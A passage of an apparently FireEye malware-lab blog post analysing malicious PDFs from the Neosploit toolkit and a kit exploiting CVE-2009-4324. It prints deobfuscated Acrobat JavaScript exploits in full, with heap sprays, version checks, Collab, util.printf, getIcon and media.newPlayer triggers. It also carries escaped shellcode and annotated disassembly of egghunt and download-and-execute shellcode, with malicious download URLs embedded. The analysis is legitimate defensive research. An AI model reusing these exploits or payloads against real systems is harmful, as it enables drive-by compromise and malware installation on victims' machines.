aD3K_EP_v_WML61;O86U_8++;}S8_T83_ajR = A_p_p7p2__u2x[0].length ? 0 : 1;A_p_p7p2__u2x[O86U_8] = "00";A_p_p7p2__u2x[O86U_8 + 1] = "00";O86U_8 += 2;if ((A_p_p7p2__u2x.length - S8_T83_ajR) % 2) {A_p_p7p2__u2x[O86U_8] = "00";}while(S8_T83_ajR < A_p_p7p2__u2x.length) {nd__8__O_E6 += "%u" + A_p_p7p2__u2x[S8_T83_ajR + 1] + A_p_p7p2__u2x[S8_T83_ajR];S8_T83_ajR += 2;}nd__8__O_E6 += "%u0000";return nd__8__O_E6;}function jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ){while (x56C0_13__c.length*2<DcG_u7V_L_s_uJ) {x56C0_13__c += x56C0_13__c;}x56C0_13__c = x56C0_13__c.substring(0,DcG_u7V_L_s_uJ/2);return x56C0_13__c;}function EU_xp43s(cF_t_wgG__usi_4, gtPWfQ6O, l6__x_1d){var h_2G_2 = 0x0c0c0c0c;var x56C0_13__c = unescape(gtPWfQ6O);var G_Rp3BOccXCA = w4U_ES(cF_t_wgG__usi_4, l6__x_1d);var m8Lnd5_UsJ1f = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050& [egghunt…] %u3350%uc3c0");var H_O610_85G = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc

[shellcode…] %u3438%u3861%u3361%u3239";app.hVDwfx478 = unescape(Bsv_7_w_r_Vmg(H_O610_85G, G_Rp3BOccXCA));var eY_mn_7_k_Uqk5 = 0x400000;var l825oJ_81__Ny = m8Lnd5_UsJ1f.length * 2;var DcG_u7V_L_s_uJ = eY_mn_7_k_Uqk5 - (l825oJ_81__Ny+0x38);x56C0_13__c = jM77Vg3(x56C0_13__c, DcG_u7V_L_s_uJ);var qj76_s_0_PgMBT = (h_2G_2 - 0x400000)/eY_mn_7_k_Uqk5;for (var Mg_70_P__N_D = 0; Mg_70_P__N_D < qj76_s_0_PgMBT; Mg_70_P__N_D++) {I8tR_yfW_B_G_4[Mg_70_P__N_D] = x56C0_13__c + m8Lnd5_UsJ1f;}}function Ecbg_08LGeWT0(){var SgNX5d = "";for (S8_T83_ajR = 0; S8_T83_ajR < 12; S8_T83_ajR++) {SgNX5d += unescape("%u0c0c%u0c0c");}var PoLA_T6Aa7KrU1s = "";for (S8_T83_ajR = 0; S8_T83_ajR < 750; S8_T83_ajR++) {PoLA_T6Aa7KrU1s += SgNX5d;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: PoLA_T6Aa7KrU1s});app.clearTimeOut(co3L10RH0e_sDj);}function I_w1ifF(o64O_1QbXw){var D__c6_R_Y_qv = co3L10RH0e_sDj;if ((o64O_1QbXw >= 8 && o64O_1QbXw < 8.11) || o64O_1QbXw < 7.1) {EU_xp43s(23, "%u0c0c%u0c0c", o64O_1QbXw);Ecbg_08LGeWT0();} if (D__c6_R_Y_qv) {app.clearTimeOut(D__c6_R_Y_qv);}}var l6__x_1d = 0;var K_U2Nj7_X_3__k = app.plugIns;for (var clWu_2 = 0; clWu_2 < K_U2Nj7_X_3__k.length; clWu_2++) {var A_x_Hr7 = K_U2Nj7_X_3__k[clWu_2].version;if (A_x_Hr7 > l6__x_1d) { l6__x_1d = A_x_Hr7; }}if (app.viewerVersion == 9.103 && l6__x_1d < 9.13) {l6__x_1d = 9.13;}app.C_1aWSr__pbK_tN = I_w1ifF;co3L10RH0e_sDj = app.setTimeOut("app.C_1aWSr__pbK_tN(" + l6__x_1d.toString() + ")", 50);

Editorial About Parsing PDFs

Congratulations! If you've made it this far, you're much further along than most PDF scanners. Most don't make it past the getAnnots() call. And, in the future, things are only going to get worse. There are thousands and thousands of object properties available from inside the Acrobat Javascript environment.

To fully parse, not only must you do everything in these:

But you must also handle error cases in the exact same way that Acrobat does. Your parser must be bug-compatible with Acrobat. And, OMG, the things you can do inside of a PDF. (Which I'll decline to say at the moment, lest I give anyone any ideas about new obfuscation techniques. Not that obfuscation poses any problems for us…)

Q: So how does FireEye parse PDFs?

A: We use Adobe Acrobat versions 7, 8, and 9 to parse and execute the file.

Oh this is telling...

ISO 32000-1:2008 specifies a digital form for representing electronic documents to enable users to exchange and view electronic documents independent of the environment in which they were created or the environment in which they are viewed or printed. It is intended for the developer of software that creates PDF files (conforming writers), software that reads existing PDF files and interprets their contents for display and interaction (conforming readers) and PDF products that read and/or write PDF files for a variety of other purposes (conforming products).

ISO 32000-1:2008 does not specify the following:

  • specific processes for converting paper or electronic documents to the PDF format;
  • specific technical design, user interface or implementation or operational details of rendering;
  • specific physical methods of storing these documents such as media and storage conditions;
  • methods for validating the conformance of PDF files or readers;
  • required computer hardware and/or operating system.

Shellcode

There are two chunks of shellcode; One is Skape's old Egghunt shellcode (Using the egg value 0x9050905090509050), and a common URLMon download and winexec() shellcode (I've seen it in a lot of malware lately, and in a post on some Chinese message board.)

Egghunt Shellcode

Just go read this: egghunt.c

 

00000000  90                nop

00000001 90 nop

00000002 90 nop

00000003 90 nop

00000004 90 nop

00000005 90 nop

00000006 EB21 jmp short 0x29

00000008 59 pop ecx

00000009 B850905090 mov eax,0x90509050

0000000E 51 push ecx

0000000F 6AFF push byte -0x1

00000011 33DB xor ebx,ebx

00000013 648923 mov [fs:ebx],esp

00000016 6A02 push byte +0x2

00000018 59 pop ecx

00000019 8BFB mov edi,ebx

0000001B F3AF repe scasd

0000001D 7507 jnz 0x26

0000001F FFE7 jmp edi

00000021 6681CBFF0F or bx,0xfff

00000026 43 inc ebx

00000027 EBED jmp short 0x16

00000029 E8DAFFFFFF call 0x8

0000002E 6A0C push byte +0xc

00000030 59 pop ecx

00000031 8B040C mov eax,[esp+ecx]

00000034 B1B8 mov cl,0xb8

00000036 83040806 add dword [eax+ecx],byte +0x6

0000003A 58 pop eax

0000003B 83C410 add esp,byte +0x10

0000003E 50 push eax

0000003F 33C0 xor eax,eax

00000041 C3 ret

Download to File and Exec

I started to comment this, because I haven't actually found a marked up version of it via Google, but I was also supposed to have had this blog post done last week. So I'll document the rest of this at a later date. There are actually two samples here, but they only differ by a few instructions, so I've written in the differences in inline comments.

 

00000000  90                nop

00000001 90 nop

00000002 90 nop

00000003 90 nop

00000004 90 nop

00000005 90 nop

00000006 90 nop

00000007 90 nop

00000008 90 nop

00000009 90 nop

0000000A E800000000 call 0xf ; Leave EIP on the stack for later

0000000F EB00 jmp short 0x11 ; i.e. the base address of this shellcode

00000011 E9FC000000 jmp 0x112 ; Get EIP again, base address of offset 0x112

00000016 5F pop edi ; EDI = EIP = The end

00000017 64A130000000 mov eax,[fs:0x30] ; PEB

0000001D 780C js 0x2b ; Check if Windows 95

0000001F 8B400C mov eax,[eax+0xc] ; PROCESS_MODULE_INFO

00000022 8B701C mov esi,[eax+0x1c] ; *flink

00000025 AD lodsd ; EAX = *blink

00000026 8B6808 mov ebp,[eax+0x8] ; EBP = kernel32 module base address

00000029 EB09 jmp short 0x34

0000002B 8B4034 mov eax,[eax+0x34] ; Windows 9x boilerplate

0000002E 8D407C lea eax,[eax+0x7c] ; Because everyone just copies everyone

00000031 8B683C mov ebp,[eax+0x3c] ; else's (Skape's) shellcode

00000034 8BF7 mov esi,edi ; ESI = The end, and beginning of hashes

00000036 6A04 push byte +0x4

00000038 59 pop ecx ; ECX = 0x00000004

00000039 E88F000000 call 0xcd ; find_functions

0000003E E2F9 loop 0x39

00000040 686F6E0000 push dword 0x6e6f ;

00000045 6875726C6D push dword 0x6d6c7275 ; "urlmon"

0000004A 54 push esp

0000004B FF16 call near [esi] ; loadLibraryA

0000004D 8BE8 mov ebp,eax

0000004F E879000000 call 0xcd

00000054 8BD7 mov edx,edi

00000056 47 inc edi ;

00000057 803F00 cmp byte [edi],0x0

0000005A 75FA jnz 0x56 ; End of string

0000005C 47 inc edi ; Skip null

0000005D 57 push edi ; Beginning of next string

0000005E 47 inc edi ;

0000005F 803F00 cmp byte [edi],0x0

00000062 75FA jnz 0x5e

00000064 8BEF mov ebp,edi ; EDI points to end of string

00000066 5F pop edi ; EDI Beginning of string

00000067 33C9 xor ecx,ecx

00000069 81EC04010000 sub esp,0x104 ; make 260 bytes of space

0000006F 8BDC mov ebx,esp

; This is the first instruction that these two samples diverge on:

; Only one of them has this.

; 00000071 83C30C add ebx,byte +0xc ; Leave 12 bytes of space for "regsrv32 -s "

00000071 51 push ecx ; 0

00000072 52 push edx ;

00000073 53 push ebx ; End of string

00000074 6804010000 push dword 0x104 ; 260

00000079 FF560C call near [esi+0xc] ; GetTempPathA

0000007C 5A pop edx

0000007D 59 pop ecx ;

0000007E 51 push ecx ; jump target from 0xC8

0000007F 52 push edx

00000080 8B02 mov eax,[edx]

00000082 53 push ebx ; Filename

00000083 43 inc ebx

00000084 803B00 cmp byte [ebx],0x0

00000087 75FA jnz 0x83 ; EBX points to end

00000089 817BFC2E657865 cmp dword [ebx-0x4],0x6578652e ; Ends with ".exe"?

; The other version of this shellcode uses ".dll" rather than ".exe"

; 0000008C 817BFC2E646C6C cmp dword [ebx-0x4],0x6c6c642e ; ".dll"

00000090 7503 jnz 0x95

00000092 83EB08 sub ebx,byte +0x8

00000095 8903 mov [ebx],eax ; Doesn't end with ".exe"

00000097 C743042E657865 mov dword [ebx+0x4],0x6578652e ; So append ".exe"

; Again with the DLL

; C743042E646C6C mov dword [ebx+0x4],0x6c6c642e ; ".dll"

0000009E C6430800 mov byte [ebx+0x8],0x0 ; ".exe\0"

000000A2 5B pop ebx

000000A3 8AC1 mov al,cl

000000A5 0430 add al,0x30

000000A7 884500 mov [ebp+0x0],al

000000AA 33C0 xor eax,eax

000000AC 50 push eax ; NULL lpfnCB

000000AD 50 push eax ; NULL dwReserved

000000AE 53 push ebx ; szFileName

000000AF 57 push edi ; szURL

000000B0 50 push eax ; NULL pCaller

000000B1 FF5610 call near [esi+0x10] ; URLDownloadToFileA

000000B4 83F800 cmp eax,byte +0x0 ; Download ok?

000000B7 7506 jnz 0xbf

000000B9 6A01 push byte +0x1 ; SW_SHOWNORMAL maybe?

; The alternative version executes "regsvr32 -s " rather than just a tempfile EXE name

; 83EB0C sub ebx,byte +0xc ; back up 12 bytes from beginning

; C70372656773 mov dword [ebx],0x73676572 ; "regs"

; C7430476723332 mov dword [ebx+0x4],0x32337276 ; "vr32"

; C74308202D7320 mov dword [ebx+0x8],0x20732d20 ; " -s "

000000BB 53 push ebx ; Command Line

000000BC FF5604 call near [esi+0x4] ; WinExec

000000BF 5A pop edx

000000C0 59 pop ecx

000000C1 83C204 add edx,byte +0x4

000000C4 41 inc ecx

000000C5 803A00 cmp byte [edx],0x0

000000C8 75B4 jnz 0x7e

000000CA FF5608 call near [esi+0x8] ; ExitProcess

find_functions:

000000CD 51 push ecx ; 0x00000004

000000CE 56 push esi ; The end (0x117)

000000CF 8B753C mov esi,[ebp+0x3c] ; PE header VMA

000000D2 8B742E78 mov esi,[esi+ebp+0x78] ; Export table relative offset

; This is just an alternative coding of the same instruction, X86 is full of things like this

; 8B743578 mov esi,[ebp+esi+0x78]

000000D6 03F5 add esi,ebp ; Export table VMA

000000D8 56 push esi

000000D9 8B7620 mov esi,[esi+0x20] ; Names table relative offset

000000DC 03F5 add esi,ebp ; esi = Names table VMA

000000DE 33C9 xor ecx,ecx ;

000000E0 49 dec ecx ; ecx = 0xffffffff

000000E1 41 inc ecx ; jmp from 0xF8

000000E2 AD lodsd ; eax = *esi = *Names table VMA

000000E3 03C5 add eax,ebp

000000E5 33DB xor ebx,ebx

000000E7 0FBE10 movsx edx,byte [eax] ; next entry

000000EA 3AD6 cmp dl,dh ; check for NULL (at end of table)

; Another alternative coding. This seems to imply the original source was symbolic,

; and (re)compiled/assembled to create the other version.

; 38F2 cmp dl,dh

000000EC 7408 jz 0xf6

000000EE C1CB0D ror ebx,0xd ; compute hash

000000F1 03DA add ebx,edx ; compute hash ebx = accumulator

000000F3 40 inc eax

000000F4 EBF1 jmp short 0xe7

000000F6 3B1F cmp ebx,[edi]

000000F8 75E7 jnz 0xe1

000000FA 5E pop esi

000000FB 8B5E24 mov ebx,[esi+0x24] ; Ordinals table relative offset

000000FE 03DD add ebx,ebp ; Ordinals table VMA

00000100 668B0C4B mov cx,[ebx+ecx*2] ; Extrapolate function's ordinal

00000104 8B5E1C mov ebx,[esi+0x1c] ; Address table relative offset

00000107 03DD add ebx,ebp ; Address table VMA

00000109 8B048B mov eax,[ebx+ecx*4] ; Extract the relative function offset from its ordinal

0000010C 03C5 add eax,ebp ; Function VMA

0000010E AB stosd ; *edi = eax

0000010F 5E pop esi

00000110 59 pop ecx

00000111 C3 ret

00000112 E8FFFEFFFF call 0x100000016 ; Get EIP *here = End of shellcode

00000117 db 8e 4e 0e ec ; [ESI+0] 0xec0e4e8e LoadLibraryA

0000011B db 98 fe 8a 0e ; [ESI+4] 0x0e8afe98 WinExec

0000011F db 7e d8 e2 73 ; [ESI+8] 0x73e2d87e ExitProcess

00000123 db 33 ca 8a 5b ; [ESI+C] 0x5b8aca33 GetTempPathA

00000127 db 36 1a 2f 70 ; [ESI+10] 0x702f1a36 URLDownloadToFileA

0000012B db 6b 74 47 6f 00 ; "ktGo" ??

;Alt: db 6c 4c 70 6f 00 ; "lLpo" ??

0000014A 68 74 74 70 3a 2f ; http:/

00000150 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2e 61 6e 61 6c ; /google.com.anal

00000160 79 74 69 63 73 2e 65 69 63 79 78 74 61 65 63 75 ; ytics.eicyxtaecu

00000170 6e 2e 63 6f 6d 2f 6e 74 65 2f 41 56 4f 52 50 31 ; n.com/nte/AVORP1

00000180 54 52 45 53 54 31 31 2e 70 79 2f 65 48 39 39 39 ; TREST11.py/eH999

00000190 61 34 35 35 31 56 30 31 30 30 66 30 37 30 30 30 ; a4551V0100f07000

000001a0 36 52 30 30 30 30 30 30 30 30 31 30 32 54 64 32 ; 6R00000000102Td2

000001b0 64 63 63 61 37 64 32 30 31 6c 30 34 30 39 4b 39 ; dcca7d201l0409K9

000001c0 31 61 36 38 39 34 38 33 32 30 00 00 ; 1a68948320..

00000130 db 68 74 74 70 3a 2f 2f 6c 61 72 79 6a 75 2e 69 6e ; http://laryju.in

00000140 db 66 6f 2f 63 67 69 2d 62 69 6e 2f 71 77 2f 65 48 ; fo/cgi-bin/qw/eH

00000150 db 33 66 63 37 66 34 39 65 56 30 31 30 30 66 30 36 ; 3fc7f49eV0100f06

00000160 db 30 30 30 36 52 30 30 30 30 30 30 30 30 31 30 32 ; 0006R00000000102

00000170 db 54 36 63 64 63 38 39 37 38 32 30 31 6c 30 34 30 ; T6cdc8978201l040

00000180 db 39 00 ; 9.

Breaking News

So, after I'd already written most of this, another PDF sample showed up, also using similar metadata tricks, but in a different way than these Neosploit samples. I suspect it's a different toolkit, as the PDF is structured differently.

[The URL will be something like http://<ip address>/bbh/pdf.php .]

This PDF is also exploiting the recent Adobe 0-day CVE-2009-4324 (and a few others for good measure).

You should all know how to read this by now.

(Unless you've skipped over this entire post to here.)

I'm using 323cd2b18026019ab8364efa96893062 for this example

The Javascript segments are referenced like this in the PDF.

9 0 obj

<</Creator (Adobe)

/Title 5 0 R

/Producer 14 0 R

/Author 51 0 R

/CreationDate (D:20080924194756)

>>

endobj

 

 

 

 

This object (the info.Author) has the exploit:

 

 

51 0 obj

<<

/Filter /FlateDecode

/Length 2630

>>

stream

Decompressed it's "lka166lka175lka16elka163lka174lka169lka16 […]


endstream

endobj

 

 

If you don't want to have to deal with all that tedious mucking about with Javascript to decode, just do:

perl -ne 's/lka1//g; print(pack("H*",$_));'

 

 

31 0 obj

<< /S /JavaScript /JS 32 0 R >>

endobj

32 0 obj

<<

/Filter /FlateDecode

/Length 159

>>

stream

 

Uncompressed:

 

 

var xyuvam = 'lka';

var z = unescape;

var yhahahahahahavvvvvv = 'p'+z(%6c%61%63%65)+'(/';

eval('var bolshayapizdavam = '%';var nenadoAVscaner = '1/g,bolshayapizdavam)';');

eval('var bu'+'hae'+'ca = ev'+'a'+'l;');

 

 

endstream

endobj

 

 

 

 

33 0 obj

<< /S /JavaScript /JS 34 0 R >>

endobj

34 0 obj

<<

/Filter /FlateDecode

/Length 102

>>

stream

Uncompressed:

 

 

buhaeca('var xyuznaet = this.in'+z(%66%6f%2e%61%75%74)+'hor;');

var poxyunavse = 'xyuznaet.re';

 

 

endstream

endobj

 

 

Obviously,%66%6f%2e%61%75%74 is fo.aut, so glueing that all together, it becomes this.info.author;, otherwise known as Object #51 (See elsewhere).

 

 

35 0 obj

<< /S /JavaScript /JS 36 0 R >>

endobj

36 0 obj

<<

/Filter /FlateDecode

/Length 88

>>

stream

Uncompressed:

 

 

var lkaa = poxyunavse + yhahahahahahavvvvvv +xyuvam+ nenadoAVscaner;

var xxx = buhaeca(lkaa);

 

 

endstream

endobj

 

 

 

 

37 0 obj

<< /S /JavaScript /JS 38 0 R >>

endobj

38 0 obj

<<

/Filter /FlateDecode

/Length 60

>>

stream

Uncompressed:

 

 

var ietoktoewe = z(unescape(xxx));

buhaeca(ietoktoewe);

 

 

endstream

endobj

 

 

So, one of the odd things about this PDF, is that there are several object names defined, but I don't see them used anywhere. (In short, you can rename objects from 123 00 R to something easier to remember, like /Bob.)

 

 

 

48 0 obj

<< /Names [(xyak) 31 0 R (fuckinshit) 33 0 R (komonogirsl) 35 0 R (komonogirsls) 37 0 R ]

>>

endobj

 

Also Object #5 and Object #14 are empty. This is info.Title and info.Producer respectively.

 

5 0 obj

<<

/Filter /FlateDecode

/Length 0

>>

stream

endstream

endobj

14 0 obj

<<

/Filter /FlateDecode

/Length 0

>>

stream

endstream

endobj

51 0 R Decoded

function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}

function printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34

%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B

%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324

%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B

%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455

%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF

%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F

%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u656E%u0077");var block = unescape("%u0c0c%u0c0c");

var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e

%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273

%u4c51%u576d%u5772%u5670");while(block.length <= 32768) block+=block;block=block.substring(0,32768 - shellcode.length);

memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC",

new Date());util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());try {this.media.newPlayer(null);} catch(e)

{}util.printd(GDagaCuyNfRSFzaSZLO, new Date());} function util_printf(){var payload=unescape("%uC033%u8B64%u3040

%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44

%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150

%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56

%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865

%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56

%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60

%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073

%u3D6C%u6470%u5F66%u6170%u6B63");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A"); var heapblock=nop+payload;

var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;

while(bigblock.length<spray){bigblock+=bigblock;} var fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}

var mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}

var num=129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888

88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888

888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} function collab_email(){

var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44

%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150

%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56

%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865

%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56

%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60

%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862%u6C2F%u616F%u2E64%u6870%u3F70%u7073

%u3D6C%u6470%u5F66%u6170%u6B63");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;

var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(

var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;} var overflow=unescape("%u0c0c%u0c0c");

while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}

function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%uC033%u8B64%u3040%u0C78

%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455

%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA

%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA

%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D

%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856

%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u382F%u2E35%u3031%u322E%u3334%u312E%u3532%u622F%u6862

%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u6170%u6B63");var hWq500CN=vvpethya.length*2;var len=0x400000-(hWq500CN+0x38);

var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(

var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+vvpethya;} var tUMhNbGw=unescape("%09");

while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}}

function PPPDDDFF(){var version=app.viewerVersion.toString();version=version.replace(/\D/g,'');

var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){util_printf();}

if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){collab_email();}

if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){collab_geticon();} printd(); } PPPDDDFF();

 

 

 

 

And these seem to be on this exact same topic

 

 

http://isc.sans.org/diary.html?storyid=7906

 


 

¹ I'm not 100% certain that it is Neosploit doing this, as I'm only looking at this toolkit's output.

² Neosploit and Mebroot go together like peanut butter and chocolate.

³ It looks almost exactly like the simple example in Annex H of the PDF specification.

4 This is a bit of an oversimplification. I'm leaving out all the stuff about cross reference streams, and reconstructing a file if the xref table is damaged or missing.

 

 

 


 

 


 

 

Julia Wolf @ FireEye Malware Intelligence Lab

 

Questions/Comments to research [@] fireeye [.] com